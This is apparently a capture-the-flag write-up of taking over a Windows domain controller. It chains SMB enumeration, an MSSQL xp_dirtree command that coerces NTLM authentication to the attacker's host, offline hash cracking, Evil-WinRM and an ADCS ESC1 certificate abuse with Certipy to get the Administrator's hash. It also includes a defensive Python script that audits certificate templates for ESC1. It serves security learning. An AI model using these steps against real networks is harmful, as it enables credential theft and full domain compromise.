Enumeration

Nmap

The Nmap scan showed LDAP and Kerberos, the service set that identifies an Active Directory Domain Controller, so the target was most likely the DC for the domain.

00 - nmap output

SMB

Enumerating the SMB shares turned up a non-default share named Public, which contained a readable PDF about SQL procedures.

01 - smbclient

The SQL Procedures PDF contained credentials for a guest account, which let me authenticate to the MSSQL service.

02 - sql procedures pdf

Exploitation

Getting Service Account

To identify the account running MSSQL, I started an SMB server on my attacking machine and made the database connect to it with the xp_dirtree extended stored procedure:

EXEC master.sys.xp_dirtree '\\10.10.14.8\smbshare', 1, 1;

When SQL Server lists a UNC path it authenticates to the share as the account its service runs under, so the NTLM challenge/response is sent straight to my listener.

03 - auth to smb

As a result, my SMB server captured the Net-NTLMv2 challenge/response (the "hash" the listener prints) of the service account, sql_svc. Because the response is bound to the server challenge, it cannot be replayed or used for pass-the-hash, but it can be cracked offline.

04 - sql_svc

I then cracked it offline (hashcat mode 5600 targets this format) and recovered the service account's password.

05 - start crack

06 - cracked

Getting User

With the service account's credentials I searched the host for stored secrets and found a user's password (ryan's) recorded in the SQL Server log files.

07 - ryan password on logs

Since WinRM was reachable, I used those credentials to get a shell as that user with Evil-WinRM.

08 - got the user

Privilege Escalation

ADCS - ESC1

After gaining access to the user account, I was initially unsure how to proceed. The hint pointed at a vulnerable Active Directory Certificate Services (ADCS) setup, so I enumerated the ADCS configuration with Certipy and identified an ESC1 template: one that lets the enrollee supply the subject alternative name, carries an EKU usable for client authentication, requires neither manager approval nor authorized signatures, and is enrollable by low-privileged domain users. With those conditions met, any user can request a certificate that names the Administrator.

09 - certipy linux

10 - certificate template
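As an added example (not Certipy's code and not from the writeup), the script below evaluates the ESC1 preconditions on certificate template attributes the way an auditor would after pulling them from LDAP. Attribute names and flag bits are from MS-CRTD (msPKI-Certificate-Name-Flag bit 0x1 is ENROLLEE_SUPPLIES_SUBJECT, msPKI-Enrollment-Flag bit 0x2 is manager approval, msPKI-RA-Signature is the signature count); the template names, ACLs and CA name in the sample data are constructed. It also shows the corrected configuration beside the vulnerable one.

```python
"""Evaluate AD CS certificate templates for the ESC1 conditions (added example; constructed data)."""
from dataclasses import dataclass, replace
from typing import Dict, Iterable, List

# Flag bits from MS-CRTD (template objects live under CN=Certificate Templates,CN=Public Key Services,...).
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag: "CA certificate manager approval"

# EKU OIDs that make a certificate usable for domain authentication (PKINIT / Schannel).
CLIENT_AUTH_EKUS = frozenset({
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
})

# Principals whose Certificate-Enrollment right means "every domain user or computer can enroll".
LOW_PRIV_PRINCIPALS = frozenset({"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"})


@dataclass(frozen=True)
class Template:
    """The template attributes that decide ESC1, as they would be read from LDAP."""
    name: str
    name_flag: int                # msPKI-Certificate-Name-Flag
    enrollment_flag: int          # msPKI-Enrollment-Flag
    ra_signatures: int            # msPKI-RA-Signature (authorized signatures required)
    ekus: frozenset               # pKIExtendedKeyUsage OIDs; empty means any purpose
    enroll_principals: frozenset  # principals granted Certificate-Enrollment (0e10c968-78fb-11d2-90d4-00c04f79dc55)
    published_by: frozenset       # enterprise CAs listing this template in certificateTemplates


def esc1_conditions(t: Template) -> Dict[str, bool]:
    """Each precondition evaluated separately, so a report can name the one to fix."""
    return {
        "published by an enterprise CA": bool(t.published_by),
        "low-privileged principals can enroll": bool(t.enroll_principals & LOW_PRIV_PRINCIPALS),
        "no manager approval": not (t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS),
        "no authorized signatures required": t.ra_signatures == 0,
        "EKU permits client authentication": (not t.ekus) or bool(t.ekus & CLIENT_AUTH_EKUS),
        "enrollee supplies the subject/SAN": bool(t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
    }


def is_esc1(t: Template) -> bool:
    return all(esc1_conditions(t).values())


def find_esc1(templates: Iterable[Template]) -> List[str]:
    return [t.name for t in templates if is_esc1(t)]


def remediate(t: Template) -> Template:
    """Two independent fixes: stop the requester choosing the SAN, and require manager approval."""
    return replace(
        t,
        name_flag=t.name_flag & ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        enrollment_flag=t.enrollment_flag | CT_FLAG_PEND_ALL_REQUESTS,
    )


# Constructed sample templates: names, flags, ACLs and the CA name are made up for this example.
TEMPLATES = [
    # Classic ESC1: any domain user enrolls, picks the UPN, and the certificate works for PKINIT.
    Template("UserSupplied-Auth", CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, 0, 0,
             frozenset({"1.3.6.1.5.5.7.3.2"}), frozenset({"Domain Users"}), frozenset({"CORP-CA"})),
    # Same template with manager approval switched on: requests queue for a CA officer, not ESC1.
    Template("UserSupplied-Approved", CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, CT_FLAG_PEND_ALL_REQUESTS, 0,
             frozenset({"1.3.6.1.5.5.7.3.2"}), frozenset({"Domain Users"}), frozenset({"CORP-CA"})),
    # Requester chooses the SAN, but the EKU is Server Authentication only: no domain logon.
    Template("WebServer", CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, 0, 0,
             frozenset({"1.3.6.1.5.5.7.3.1"}), frozenset({"Domain Users"}), frozenset({"CORP-CA"})),
    # Subject built from the requester's AD object: the user cannot name someone else.
    Template("Standard-User", 0, 0, 0,
             frozenset({"1.3.6.1.5.5.7.3.2"}), frozenset({"Domain Users"}), frozenset({"CORP-CA"})),
]

if __name__ == "__main__":
    for t in TEMPLATES:
        print(t.name, "ESC1" if is_esc1(t) else "ok", esc1_conditions(t))
    print("after remediation:", is_esc1(remediate(TEMPLATES[0])))
```

In a real audit the attributes come from the Configuration partition over LDAP, and the enrollment principals are read from the template's nTSecurityDescriptor (ExtendedRight with the Certificate-Enrollment GUID, or GenericAll); Certipy's find command automates exactly this collection and applies the same conditions.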

From there the process was straightforward: with Certipy I requested a certificate from the vulnerable template while supplying the Administrator's UPN as the subject alternative name, then authenticated with that certificate over Kerberos PKINIT. Certipy obtains a TGT for Administrator and, by requesting a user-to-user ticket and decrypting the PAC credential information inside it, recovers the Administrator's NT hash.

11 - request

12 - hash

Finally, I passed the recovered NT hash to Evil-WinRM (its -H option) and obtained an Administrator shell.

13 - got it

At that point, the machine was fully compromised.

pwned

For more information about ADCS privilege escalation, check out the links below:

  • https://www.nccgroup.com/us/research-blog/defending-your-directory-an-expert-guide-to-fortifying-active-directory-certificate-services-adcs-against-exploitation/
  • https://abrictosecurity.com/pentesting-active-directory-certificate-services-adcs-esc1-esc8/
